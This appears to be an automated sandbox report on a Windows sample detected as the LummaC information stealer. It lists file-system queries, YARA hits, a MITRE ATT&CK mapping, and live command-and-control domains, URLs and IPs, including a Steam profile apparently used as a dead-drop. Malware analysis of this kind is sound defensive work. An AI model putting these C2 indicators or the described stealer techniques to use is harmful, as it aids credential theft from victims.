Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1287375743.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1300615651.0000000000781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1286771741.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4048, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 4048, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	63%	ReversingLabs	Win32.Trojan.Vidar
file.exe	100%	Avira	HEUR/AGEN.1306956
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://lev-tolstoi.com/x	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apiyp	100%	Avira URL Cloud	malware
https://lev-tolstoi.com:443/apiocal	100%	Avira URL Cloud	malware
enterwahsh.biz	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apix	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/api$	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apiC	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/B	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/ws	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apisy	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
lev-tolstoi.com	172.67.157.254	true	false	high
enterwahsh.biz	unknown	unknown	true	unknown
wordyfindy.lat	unknown	unknown	false	high
slipperyloo.lat	unknown	unknown	false	high
curverpluch.lat	unknown	unknown	false	high
tentabatte.lat	unknown	unknown	false	high
manyrestro.lat	unknown	unknown	false	high
bashfulacid.lat	unknown	unknown	false	high
shapestickyr.lat	unknown	unknown	false	high
talkynicer.lat	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
slipperyloo.lat	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
https://lev-tolstoi.com/api	false		high
enterwahsh.biz	true	Avira URL Cloud: malware	unknown
curverpluch.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
bashfulacid.lat	false		high
wordyfindy.lat	false		high
shapestickyr.lat	false		high
talkynicer.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/x	file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/apiocal	file.exe, 00000000.00000002.1608203623.0000000000703000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/?subsection=broadcasts	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/s	file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apiyp	file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/subscriber_agreement/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/api$	file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900y	file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/	file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199724331900	file.exe, 00000000.00000003.1274773836.0000000000703000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apix	file.exe, 00000000.00000003.1274944265.000000000073A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/discussions/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apiC	file.exe, 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.10.dr	false		high
https://store.steampowered.com/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/B	file.exe, 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apisy	file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lev-tolstoi.com/ws	file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/api	file.exe, 00000000.00000002.1608203623.0000000000703000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.0000000000703000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/mobile	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/	file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81	file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583463
Start date and time:	2025-01-02 20:15:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@12/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 35 Number of non-executed functions: 64
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.45, 40.126.31.69, 4.245.163.56
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:16:35	API Interceptor	9x Sleep call for process: file.exe modified
15:30:19	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.157.254	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse
	KRNL.exe	Get hash	malicious	LummaC	Browse
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse
	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse
	XYQ1pqHNiT.exe	Get hash	malicious	LummaC	Browse
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	172.67.157.254
	KRNL.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.157.254
	gdi32.dll	Get hash	malicious	LummaC	Browse	104.21.66.86
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	KRNL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
